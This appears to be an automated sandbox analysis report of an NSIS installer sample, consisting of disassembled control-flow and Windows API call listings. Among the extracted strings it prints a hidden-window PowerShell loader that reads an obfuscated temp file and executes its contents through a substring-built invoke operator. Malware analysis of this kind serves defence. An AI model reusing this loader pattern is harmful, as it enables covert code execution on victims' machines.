RegDeleteValueA RegCloseKey 3911->3912 3912->3914 3919 402aa5 3915->3919 3923 402af1 3915->3923 3916 402acb RegEnumKeyA 3917 402add RegCloseKey 3916->3917 3916->3919 3920 4060c8 5 API calls 3917->3920 3918 402b02 RegCloseKey 3918->3923 3919->3916 3919->3917 3919->3918 3921 402a7a 5 API calls 3919->3921 3922 402aed 3920->3922 3921->3919 3922->3923 3924 402b1d RegDeleteKeyA 3922->3924 3923->3914 3924->3923 3925 402688 3926 402a3a 18 API calls 3925->3926 3927 40268f FindFirstFileA 3926->3927 3928 4026b2 3927->3928 3932 4026a2 3927->3932 3929 4026b9 3928->3929 3933 405c8d wsprintfA 3928->3933 3934 405d2f lstrcpynA 3929->3934 3933->3929 3934->3932 3935 401c8a 3936 402a1d 18 API calls 3935->3936 3937 401c90 IsWindow 3936->3937 3938 4019f3 3937->3938 3939 40430b 3940 404341 3939->3940 3941 40431b 3939->3941 3943 403f7b 8 API calls 3940->3943 3942 403f14 19 API calls 3941->3942 3944 404328 SetDlgItemTextA 3942->3944 3945 40434d 3943->3945 3944->3940 3064 40310f SetErrorMode GetVersion 3065 403146 3064->3065 3066 40314c 3064->3066 3067 4060c8 5 API calls 3065->3067 3152 40605a GetSystemDirectoryA 3066->3152 3067->3066 3069 403162 lstrlenA 3069->3066 3070 403171 3069->3070 3155 4060c8 GetModuleHandleA 3070->3155 3073 4060c8 5 API calls 3074 403180 #17 OleInitialize SHGetFileInfoA 3073->3074 3161 405d2f lstrcpynA 3074->3161 3076 4031bd GetCommandLineA 3162 405d2f lstrcpynA 3076->3162 3078 4031cf GetModuleHandleA 3079 4031e6 3078->3079 3080 4057cc CharNextA 3079->3080 3081 4031fa CharNextA 3080->3081 3090 40320a 3081->3090 3082 4032d4 3083 4032e7 GetTempPathA 3082->3083 3163 4030de 3083->3163 3085 4032ff 3087 403303 GetWindowsDirectoryA lstrcatA 3085->3087 3088 403359 DeleteFileA 3085->3088 3086 4057cc CharNextA 3086->3090 3091 4030de 12 API calls 3087->3091 3173 402c66 GetTickCount GetModuleFileNameA 3088->3173 3090->3082 3090->3086 3092 4032d6 3090->3092 3094 40331f 3091->3094 3257 405d2f lstrcpynA 3092->3257 3093 40336d 3101 4057cc CharNextA 3093->3101 3134 4033f3 
3093->3134 3147 403403 3093->3147 3094->3088 3096 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3094->3096 3098 4030de 12 API calls 3096->3098 3099 403351 3098->3099 3099->3088 3099->3147 3105 403388 3101->3105 3103 40353b 3107 403543 GetCurrentProcess OpenProcessToken 3103->3107 3108 4035bd ExitProcess 3103->3108 3104 40341d 3267 405525 3104->3267 3112 403433 3105->3112 3113 4033ce 3105->3113 3109 40358e 3107->3109 3110 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3107->3110 3115 4060c8 5 API calls 3109->3115 3110->3109 3271 4054a8 3112->3271 3116 40588f 18 API calls 3113->3116 3118 403595 3115->3118 3119 4033d9 3116->3119 3123 4035aa ExitWindowsEx 3118->3123 3126 4035b6 3118->3126 3119->3147 3258 405d2f lstrcpynA 3119->3258 3121 403454 lstrcatA lstrcmpiA 3125 403470 3121->3125 3121->3147 3122 403449 lstrcatA 3122->3121 3123->3108 3123->3126 3128 403475 3125->3128 3129 40347c 3125->3129 3130 40140b 2 API calls 3126->3130 3127 4033e8 3259 405d2f lstrcpynA 3127->3259 3274 40540e CreateDirectoryA 3128->3274 3279 40548b CreateDirectoryA 3129->3279 3130->3108 3201 4036af 3134->3201 3136 403481 SetCurrentDirectoryA 3137 403490 3136->3137 3138 40349b 3136->3138 3282 405d2f lstrcpynA 3137->3282 3283 405d2f lstrcpynA 3138->3283 3141 405d51 18 API calls 3142 4034da DeleteFileA 3141->3142 3143 4034e7 CopyFileA 3142->3143 3149 4034a9 3142->3149 3143->3149 3144 40352f 3146 405bea 38 API calls 3144->3146 3145 405bea 38 API calls 3145->3149 3146->3147 3260 4035d5 3147->3260 3148 405d51 18 API calls 3148->3149 3149->3141 3149->3144 3149->3145 3149->3148 3150 4054c0 2 API calls 3149->3150 3151 40351b CloseHandle 3149->3151 3150->3149 3151->3149 3153 40607c wsprintfA LoadLibraryExA 3152->3153 3153->3069 3156 4060e4 3155->3156 3157 4060ee GetProcAddress 3155->3157 3158 40605a 3 API calls 3156->3158 3159 403179 3157->3159 3160 4060ea 3158->3160 3159->3073 3160->3157 3160->3159 3161->3076 3162->3078 3164 405f9a 5 API calls 3163->3164 3165 4030ea 
3164->3165 3166 4030f4 3165->3166 3167 4057a1 3 API calls 3165->3167 3166->3085 3168 4030fc 3167->3168 3169 40548b 2 API calls 3168->3169 3170 403102 3169->3170 3284 4059d1 3170->3284 3288 4059a2 GetFileAttributesA CreateFileA 3173->3288 3175 402ca6 3193 402cb6 3175->3193 3289 405d2f lstrcpynA 3175->3289 3177 402ccc 3178 4057e8 2 API calls 3177->3178 3179 402cd2 3178->3179 3290 405d2f lstrcpynA 3179->3290 3181 402cdd GetFileSize 3182 402dd9 3181->3182 3195 402cf4 3181->3195 3291 402c02 3182->3291 3184 402de2 3186 402e12 GlobalAlloc 3184->3186 3184->3193 3326 4030c7 SetFilePointer 3184->3326 3302 4030c7 SetFilePointer 3186->3302 3188 402e45 3192 402c02 6 API calls 3188->3192 3190 402dfb 3194 4030b1 ReadFile 3190->3194 3191 402e2d 3303 402e9f 3191->3303 3192->3193 3193->3093 3197 402e06 3194->3197 3195->3182 3195->3188 3195->3193 3198 402c02 6 API calls 3195->3198 3323 4030b1 3195->3323 3197->3186 3197->3193 3198->3195 3199 402e39 3199->3193 3199->3199 3200 402e76 SetFilePointer 3199->3200 3200->3193 3202 4060c8 5 API calls 3201->3202 3203 4036c3 3202->3203 3204 4036c9 3203->3204 3205 4036db 3203->3205 3337 405c8d wsprintfA 3204->3337 3206 405c16 3 API calls 3205->3206 3207 403706 3206->3207 3209 403724 lstrcatA 3207->3209 3211 405c16 3 API calls 3207->3211 3210 4036d9 3209->3210 3328 403974 3210->3328 3211->3209 3214 40588f 18 API calls 3217 403756 3214->3217 3215 4037df 3216 40588f 18 API calls 3215->3216 3218 4037e5 3216->3218 3217->3215 3219 405c16 3 API calls 3217->3219 3221 4037f5 LoadImageA 3218->3221 3222 405d51 18 API calls 3218->3222 3220 403782 3219->3220 3220->3215 3225 40379e lstrlenA 3220->3225 3228 4057cc CharNextA 3220->3228 3223 40389b 3221->3223 3224 40381c RegisterClassA 3221->3224 3222->3221 3227 40140b 2 API calls 3223->3227 3226 403852 SystemParametersInfoA CreateWindowExA 3224->3226 3256 4038a5 3224->3256 3229 4037d2 3225->3229 3230 4037ac lstrcmpiA 3225->3230 3226->3223 3231 4038a1 3227->3231 3232 40379c 3228->3232 3234 4057a1 3 API calls 
3229->3234 3230->3229 3233 4037bc GetFileAttributesA 3230->3233 3236 403974 19 API calls 3231->3236 3231->3256 3232->3225 3235 4037c8 3233->3235 3237 4037d8 3234->3237 3235->3229 3238 4057e8 2 API calls 3235->3238 3239 4038b2 3236->3239 3338 405d2f lstrcpynA 3237->3338 3238->3229 3241 403941 3239->3241 3242 4038be ShowWindow 3239->3242 3243 40501a 5 API calls 3241->3243 3244 40605a 3 API calls 3242->3244 3246 403947 3243->3246 3245 4038d6 3244->3245 3247 4038e4 GetClassInfoA 3245->3247 3250 40605a 3 API calls 3245->3250 3248 403963 3246->3248 3249 40394b 3246->3249 3252 4038f8 GetClassInfoA RegisterClassA 3247->3252 3253 40390e DialogBoxParamA 3247->3253 3251 40140b 2 API calls 3248->3251 3255 40140b 2 API calls 3249->3255 3249->3256 3250->3247 3251->3256 3252->3253 3254 40140b 2 API calls 3253->3254 3254->3256 3255->3256 3256->3147 3257->3083 3258->3127 3259->3134 3261 4035ed 3260->3261 3262 4035df CloseHandle 3260->3262 3340 40361a 3261->3340 3262->3261 3265 4055d1 69 API calls 3266 40340c OleUninitialize 3265->3266 3266->3103 3266->3104 3268 40553a 3267->3268 3269 40342b ExitProcess 3268->3269 3270 40554e MessageBoxIndirectA 3268->3270 3270->3269 3272 4060c8 5 API calls 3271->3272 3273 403438 lstrcatA 3272->3273 3273->3121 3273->3122 3275 40347a 3274->3275 3276 40545f GetLastError 3274->3276 3275->3136 3276->3275 3277 40546e SetFileSecurityA 3276->3277 3277->3275 3278 405484 GetLastError 3277->3278 3278->3275 3280 40549b 3279->3280 3281 40549f GetLastError 3279->3281 3280->3136 3281->3280 3282->3138 3283->3149 3285 4059dc GetTickCount GetTempFileNameA 3284->3285 3286 40310d 3285->3286 3287 405a09 3285->3287 3286->3085 3287->3285 3287->3286 3288->3175 3289->3177 3290->3181 3292 402c23 3291->3292 3293 402c0b 3291->3293 3296 402c33 GetTickCount 3292->3296 3297 402c2b 3292->3297 3294 402c14 DestroyWindow 3293->3294 3295 402c1b 3293->3295 3294->3295 3295->3184 3299 402c41 CreateDialogParamA ShowWindow 3296->3299 3300 402c64 3296->3300 3298 406104 2 API calls 
3297->3298 3301 402c31 3298->3301 3299->3300 3300->3184 3301->3184 3302->3191 3305 402eb5 3303->3305 3304 402ee3 3307 4030b1 ReadFile 3304->3307 3305->3304 3327 4030c7 SetFilePointer 3305->3327 3308 402eee 3307->3308 3309 402f00 GetTickCount 3308->3309 3310 40304a 3308->3310 3316 403034 3308->3316 3313 402f4f 3309->3313 3309->3316 3311 40308c 3310->3311 3312 40304e 3310->3312 3315 4030b1 ReadFile 3311->3315 3312->3316 3317 4030b1 ReadFile 3312->3317 3318 405a49 WriteFile 3312->3318 3314 4030b1 ReadFile 3313->3314 3313->3316 3319 402fa5 GetTickCount 3313->3319 3320 402fca MulDiv wsprintfA 3313->3320 3322 405a49 WriteFile 3313->3322 3314->3313 3315->3316 3316->3199 3317->3312 3318->3312 3319->3313 3321 404f48 25 API calls 3320->3321 3321->3313 3322->3313 3324 405a1a ReadFile 3323->3324 3325 4030c4 3324->3325 3325->3195 3326->3190 3327->3304 3329 403988 3328->3329 3339 405c8d wsprintfA 3329->3339 3331 4039f9 3332 405d51 18 API calls 3331->3332 3333 403a05 SetWindowTextA 3332->3333 3334 403a21 3333->3334 3335 403734 3333->3335 3334->3335 3336 405d51 18 API calls 3334->3336 3335->3214 3336->3334 3337->3210 3338->3215 3339->3331 3341 403628 3340->3341 3342 4035f2 3341->3342 3343 40362d FreeLibrary GlobalFree 3341->3343 3342->3265 3343->3342 3343->3343 3344 402410 3345 402b44 19 API calls 3344->3345 3346 40241a 3345->3346 3347 402a3a 18 API calls 3346->3347 3348 402423 3347->3348 3349 40242d RegQueryValueExA 3348->3349 3354 4026a6 3348->3354 3350 402453 RegCloseKey 3349->3350 3351 40244d 3349->3351 3350->3354 3351->3350 3355 405c8d wsprintfA 3351->3355 3355->3350 3356 401f90 3357 401fa2 3356->3357 3367 402050 3356->3367 3358 402a3a 18 API calls 3357->3358 3360 401fa9 3358->3360 3359 401423 25 API calls 3362 4021c9 3359->3362 3361 402a3a 18 API calls 3360->3361 3363 401fb2 3361->3363 3364 401fc7 LoadLibraryExA 3363->3364 3365 401fba GetModuleHandleA 3363->3365 3366 401fd7 GetProcAddress 3364->3366 3364->3367 3365->3364 3365->3366 3368 402023 3366->3368 3369 401fe6 
3366->3369 3367->3359 3370 404f48 25 API calls 3368->3370 3372 401ff6 3369->3372 3374 401423 3369->3374 3370->3372 3372->3362 3373 402044 FreeLibrary 3372->3373 3373->3362 3375 404f48 25 API calls 3374->3375 3376 401431 3375->3376 3376->3372 3946 401490 3947 404f48 25 API calls 3946->3947 3948 401497 3947->3948 3439 401595 3440 402a3a 18 API calls 3439->3440 3441 40159c SetFileAttributesA 3440->3441 3442 4015ae 3441->3442 3949 402616 3950 40261d 3949->3950 3951 40287c 3949->3951 3952 402a1d 18 API calls 3950->3952 3953 402628 3952->3953 3954 40262f SetFilePointer 3953->3954 3954->3951 3955 40263f 3954->3955 3957 405c8d wsprintfA 3955->3957 3957->3951 3448 401717 3449 402a3a 18 API calls 3448->3449 3450 40171e SearchPathA 3449->3450 3451 401739 3450->3451 3958 402519 3959 40252e 3958->3959 3960 40251e 3958->3960 3961 402a3a 18 API calls 3959->3961 3962 402a1d 18 API calls 3960->3962 3963 402535 lstrlenA 3961->3963 3964 402527 3962->3964 3963->3964 3965 402557 3964->3965 3966 405a49 WriteFile 3964->3966 3966->3965 3967 40149d 3968 4014ab PostQuitMessage 3967->3968 3969 40226e 3967->3969 3968->3969 3970 4046a3 3971 4046b3 3970->3971 3972 4046cf 3970->3972 3981 405509 GetDlgItemTextA 3971->3981 3974 404702 3972->3974 3975 4046d5 SHGetPathFromIDListA 3972->3975 3977 4046e5 3975->3977 3980 4046ec SendMessageA 3975->3980 3976 4046c0 SendMessageA 3976->3972 3979 40140b 2 API calls 3977->3979 3979->3980 3980->3974 3981->3976 3982 401ca7 3983 402a1d 18 API calls 3982->3983 3984 401cae 3983->3984 3985 402a1d 18 API calls 3984->3985 3986 401cb6 GetDlgItem 3985->3986 3987 402513 3986->3987 3988 404028 lstrcpynA lstrlenA 2932 40192a 2933 40192c 2932->2933 2934 402a3a 18 API calls 2933->2934 2935 401931 2934->2935 2938 4055d1 2935->2938 2978 40588f 2938->2978 2941 405610 2944 405748 2941->2944 2992 405d2f lstrcpynA 2941->2992 2942 4055f9 DeleteFileA 2943 40193a 2942->2943 2944->2943 3010 406033 FindFirstFileA 2944->3010 2946 405636 2947 405649 2946->2947 2948 40563c lstrcatA 
2946->2948 2993 4057e8 lstrlenA 2947->2993 2950 40564f 2948->2950 2953 40565d lstrcatA 2950->2953 2955 405668 lstrlenA FindFirstFileA 2950->2955 2953->2955 2954 405766 3013 4057a1 lstrlenA CharPrevA 2954->3013 2957 40573e 2955->2957 2976 40568c 2955->2976 2957->2944 2959 4057cc CharNextA 2959->2976 2960 405589 5 API calls 2961 405778 2960->2961 2962 405792 2961->2962 2965 40577c 2961->2965 2966 404f48 25 API calls 2962->2966 2963 40571d FindNextFileA 2967 405735 FindClose 2963->2967 2963->2976 2965->2943 2968 404f48 25 API calls 2965->2968 2966->2943 2967->2957 2969 405789 2968->2969 2970 405bea 38 API calls 2969->2970 2973 405790 2970->2973 2972 4055d1 62 API calls 2972->2976 2973->2943 2974 404f48 25 API calls 2974->2963 2975 404f48 25 API calls 2975->2976 2976->2959 2976->2963 2976->2972 2976->2974 2976->2975 2997 405d2f lstrcpynA 2976->2997 2998 405589 2976->2998 3006 405bea MoveFileExA 2976->3006 3016 405d2f lstrcpynA 2978->3016 2980 4058a0 3017 40583a CharNextA CharNextA 2980->3017 2983 4055f1 2983->2941 2983->2942 2984 405f9a 5 API calls 2990 4058b6 2984->2990 2985 4058e1 lstrlenA 2986 4058ec 2985->2986 2985->2990 2988 4057a1 3 API calls 2986->2988 2987 406033 2 API calls 2987->2990 2989 4058f1 GetFileAttributesA 2988->2989 2989->2983 2990->2983 2990->2985 2990->2987 2991 4057e8 2 API calls 2990->2991 2991->2985 2992->2946 2994 4057f5 2993->2994 2995 405806 2994->2995 2996 4057fa CharPrevA 2994->2996 2995->2950 2996->2994 2996->2995 2997->2976 3023 40597d GetFileAttributesA 2998->3023 3001 4055a4 RemoveDirectoryA 3004 4055b2 3001->3004 3002 4055ac DeleteFileA 3002->3004 3003 4055b6 3003->2976 3004->3003 3005 4055c2 SetFileAttributesA 3004->3005 3005->3003 3007 405c0b 3006->3007 3008 405bfe 3006->3008 3007->2976 3026 405a78 lstrcpyA 3008->3026 3011 405762 3010->3011 3012 406049 FindClose 3010->3012 3011->2943 3011->2954 3012->3011 3014 40576c 3013->3014 3015 4057bb lstrcatA 3013->3015 3014->2960 3015->3014 3016->2980 3018 405855 3017->3018 3021 405865 
3017->3021 3019 405860 CharNextA 3018->3019 3018->3021 3022 405885 3019->3022 3020 4057cc CharNextA 3020->3021 3021->3020 3021->3022 3022->2983 3022->2984 3024 405595 3023->3024 3025 40598f SetFileAttributesA 3023->3025 3024->3001 3024->3002 3024->3003 3025->3024 3027 405aa0 3026->3027 3028 405ac6 GetShortPathNameA 3026->3028 3053 4059a2 GetFileAttributesA CreateFileA 3027->3053 3029 405be5 3028->3029 3030 405adb 3028->3030 3029->3007 3030->3029 3032 405ae3 wsprintfA 3030->3032 3034 405d51 18 API calls 3032->3034 3033 405aaa CloseHandle GetShortPathNameA 3033->3029 3035 405abe 3033->3035 3036 405b0b 3034->3036 3035->3028 3035->3029 3054 4059a2 GetFileAttributesA CreateFileA 3036->3054 3038 405b18 3038->3029 3039 405b27 GetFileSize GlobalAlloc 3038->3039 3040 405b49 3039->3040 3041 405bde CloseHandle 3039->3041 3055 405a1a ReadFile 3040->3055 3041->3029 3046 405b68 lstrcpyA 3049 405b8a 3046->3049 3047 405b7c 3048 405907 4 API calls 3047->3048 3048->3049 3050 405bc1 SetFilePointer 3049->3050 3062 405a49 WriteFile 3050->3062 3053->3033 3054->3038 3056 405a38 3055->3056 3056->3041 3057 405907 lstrlenA 3056->3057 3058 405948 lstrlenA 3057->3058 3059 405950 3058->3059 3060 405921 lstrcmpiA 3058->3060 3059->3046 3059->3047 3060->3059 3061 40593f CharNextA 3060->3061 3061->3058 3063 405a67 GlobalFree 3062->3063 3063->3041 3989 4028aa SendMessageA 3990 4028c4 InvalidateRect 3989->3990 3991 4028cf 3989->3991 3990->3991 3418 4015b3 3419 402a3a 18 API calls 3418->3419 3420 4015ba 3419->3420 3421 40583a 4 API calls 3420->3421 3422 4015c2 3421->3422 3423 40161c 3422->3423 3424 4057cc CharNextA 3422->3424 3431 40548b 2 API calls 3422->3431 3432 4054a8 5 API calls 3422->3432 3434 4015eb 3422->3434 3435 401604 GetFileAttributesA 3422->3435 3425 401621 3423->3425 3426 40164a 3423->3426 3424->3422 3427 401423 25 API calls 3425->3427 3429 401423 25 API calls 3426->3429 3428 401628 3427->3428 3438 405d2f lstrcpynA 3428->3438 3436 401642 3429->3436 3431->3422 3432->3422 3433 401633 
SetCurrentDirectoryA 3433->3436 3434->3422 3437 40540e 4 API calls 3434->3437 3435->3422 3437->3434 3438->3433 3992 4016b3 3993 402a3a 18 API calls 3992->3993 3994 4016b9 GetFullPathNameA 3993->3994 3995 4016d0 3994->3995 3996 4016f1 3994->3996 3995->3996 3999 406033 2 API calls 3995->3999 3997 401705 GetShortPathNameA 3996->3997 3998 4028cf 3996->3998 3997->3998 4000 4016e1 3999->4000 4000->3996 4002 405d2f lstrcpynA 4000->4002 4002->3996 4003 4014b7 4004 4014bd 4003->4004 4005 401389 2 API calls 4004->4005 4006 4014c5 4005->4006 4007 401d38 GetDC GetDeviceCaps 4008 402a1d 18 API calls 4007->4008 4009 401d56 MulDiv ReleaseDC 4008->4009 4010 402a1d 18 API calls 4009->4010 4011 401d75 4010->4011 4012 405d51 18 API calls 4011->4012 4013 401dae CreateFontIndirectA 4012->4013 4014 402513 4013->4014 4015 404ebc 4016 404ee0 4015->4016 4017 404ecc 4015->4017 4018 404ee8 IsWindowVisible 4016->4018 4026 404eff 4016->4026 4019 404ed2 4017->4019 4020 404f29 4017->4020 4018->4020 4022 404ef5 4018->4022 4021 403f60 SendMessageA 4019->4021 4023 404f2e CallWindowProcA 4020->4023 4024 404edc 4021->4024 4025 404813 5 API calls 4022->4025 4023->4024 4025->4026 4026->4023 4027 404893 4 API calls 4026->4027 4027->4020 4028 40173e 4029 402a3a 18 API calls 4028->4029 4030 401745 4029->4030 4031 4059d1 2 API calls 4030->4031 4032 40174c 4031->4032 4032->4032 4033 401ebe 4034 402a3a 18 API calls 4033->4034 4035 401ec5 4034->4035 4036 406033 2 API calls 4035->4036 4037 401ecb 4036->4037 4039 401edd 4037->4039 4040 405c8d wsprintfA 4037->4040 4040->4039 4041 40193f 4042 402a3a 18 API calls 4041->4042 4043 401946 lstrlenA 4042->4043 4044 402513 4043->4044

Control-flow Graph

[Basic-block listing of the entry function at 0x40310f omitted (blocks 0x40310f-0x4035cf, rendered as a node/edge dump). What it shows, in block order: SetErrorMode and GetVersion; API resolution through the helper at 0x4060c8 (GetModuleHandleA/GetProcAddress, falling back to 0x40605a, which does GetSystemDirectoryA, wsprintfA and LoadLibraryExA) with lstrlenA on "UXTHEME"; COMCTL32 ordinal #17 (InitCommonControls), OleInitialize and SHGetFileInfoA; GetCommandLineA followed by a CharNextA loop that walks the command line; selection of a working directory with GetTempPathA, falling back to GetWindowsDirectoryA plus lstrcatA, and then to GetTempPathA again after two SetEnvironmentVariableA calls, each candidate checked by the helper at 0x4030de (CreateDirectoryA, then GetTickCount and GetTempFileNameA); DeleteFileA and a read of the installer's own image by the helper at 0x402c66 (GetModuleFileNameA, CreateFileA, GetFileSize, ReadFile); then either the GUI path through 0x4036af (LoadImageA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, DialogBoxParamA) or MessageBoxIndirectA (0x405525) followed by ExitProcess. A separate branch creates a directory (0x40540e or 0x40548b), calls SetCurrentDirectoryA, then DeleteFileA, CopyFileA and MoveFileExA (0x405bea) before CloseHandle. The exit path calls OleUninitialize and, on one branch, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges and ExitWindowsEx before ExitProcess. This sequence, together with the "Snik Setup" and "NSIS Error" strings in the API arguments below, matches an NSIS installer stub.]
APIs
• SetErrorMode.KERNELBASE ref: 00403134
• GetVersion.KERNEL32 ref: 0040313A
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
• #17.COMCTL32(00000007,00000009), ref: 00403185
• OleInitialize.OLE32(00000000), ref: 0040318C
• SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
• GetCommandLineA.KERNEL32(Snik Setup,NSIS Error), ref: 004031BD
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\rPO3799039985.exe",00000000), ref: 004031D0
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\rPO3799039985.exe",00000020), ref: 004031FB
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                                                                                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                                                                                                                            • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                                                                                                          • String ID: "$"C:\Users\user\Desktop\rPO3799039985.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$C:\Users\user\Desktop$C:\Users\user\Desktop\rPO3799039985.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Snik Setup$TEMP$TMP$UXTHEME$\Temp$`Ku$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)$~nsu
                                                                                                                                                                                                          • API String ID: 3329125770-2336724476
                                                                                                                                                                                                          • Opcode ID: 58f8fa9e57e5906b6f3c86c07771158f2cbcd973fc4b84140ca79d5348ef2a4e
                                                                                                                                                                                                          • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58f8fa9e57e5906b6f3c86c07771158f2cbcd973fc4b84140ca79d5348ef2a4e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                                                                                                                                          Control-flow Graph (function at 00405086; graph rendering not included in this text)
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                                                                                                                            • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00405310
                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
                                                                                                                                                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
